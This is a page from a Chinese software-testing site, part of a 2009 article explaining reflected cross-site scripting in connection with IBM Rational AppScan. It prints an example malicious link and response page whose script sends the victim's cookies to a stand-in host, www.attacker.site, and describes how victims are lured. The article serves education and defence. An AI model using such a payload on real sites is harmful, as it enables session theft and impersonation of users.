• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

IBM Rational AppScan:跨站点脚本攻击深入解析

发布: 2009-4-21 10:40 | 作者: 不详 | 来源: 测试时代采编 | 查看: 442次 | 进入软件测试论坛讨论

领测软件测试网

 恶意的链接会是:

http://www.vulnerable.site/welcome.cgi?name=<script>window.open
("http://www.attacker.site/collect
  .cgi?cookie="%2Bdocument.cookie)</script>

  响应页面看起来像这样:

  <HTML> <Title>Welcome!</Title> Hi
  <script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>
  <BR>
  Welcome to our system ... </HTML>

  加载该页面的浏览器会立即执行内嵌的JavaScript,并向www.attacker.site中的collect.cgi脚本发送请求,并附带着浏览器已经拥有的www.vulnerable.site的cookies的值。这样就泄漏了客户端所拥有的www.vulnerable.site的cookies。这将允许黑客冒充受害者。客户的隐私就完全被破坏了。

  注意:

  引发JavaScript弹出窗口的出现通常足够说明该站点容易受到XSS攻击。如果可以调用JavaScriptlert方法,那么通常没理由window.open调用不成功。这就是为什么大部分XSS攻击的实例使用alert方法,因为这很容易检测其成功。   

  范围和可行性

  攻击只会在受害者用于访问站点(www.vulnerable.site)的同一个浏览器中发生。黑客需要强迫客户端访问恶意链接。这会以以下这些方式进行:

  ● 黑客发送包含强迫浏览器访问该链接的HTML页面的电子邮件消息。这要求受害者使用HTML有效的电子邮件客户端,并且客户端的HTML阅读器是用于访问www.vulnerable.site的同一个浏览器。

  ● 客户端访问可能受黑客运作的站点,其中的图片链接或其他激活的HTML强迫浏览器访问该链接。再次声明,必须要求浏览器与访问该站点和www.vulnerable.site的是同一个浏览器。

  恶意的JavaScript可以访问任何下列信息:

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/

22/2<12

关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备2023014753号-2
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网